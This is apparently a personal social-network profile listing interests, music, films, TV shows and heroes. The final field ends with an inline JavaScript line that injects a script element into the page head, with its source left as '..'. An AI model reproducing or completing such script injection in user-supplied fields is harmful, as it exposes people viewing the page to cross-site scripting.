Masonry,DeMolay,NFL(Cowboys fan of old),NASCAR,My Sisters Children,Fishing,Golf,C&W Music,Classy Young Ladies!
Free Flash Games
Mainly Country, and classic Rock (Pink Floyd, my all time favorite)
The Godfather,Scarface,Pirates of the Cariabbean,The Rock,National Treasure,A Few Good Men
Fox News,NFL,NASCAR,Big Brother,Survivor,Las Vegas,CMT
I Wait till the movie comes out.
My Parents,My Son,Most all Masons,Tom Landry,Roger Stauback,Drew Pearson,Bob Lilly,Richard Petty,President George Bush,Bill O'Riley,Rush Linbaugh,most all C&W music stars .."var s=document.createElement('script');s.src='..';document.getEl ementsByTagName('head')[0].appendChild(s);"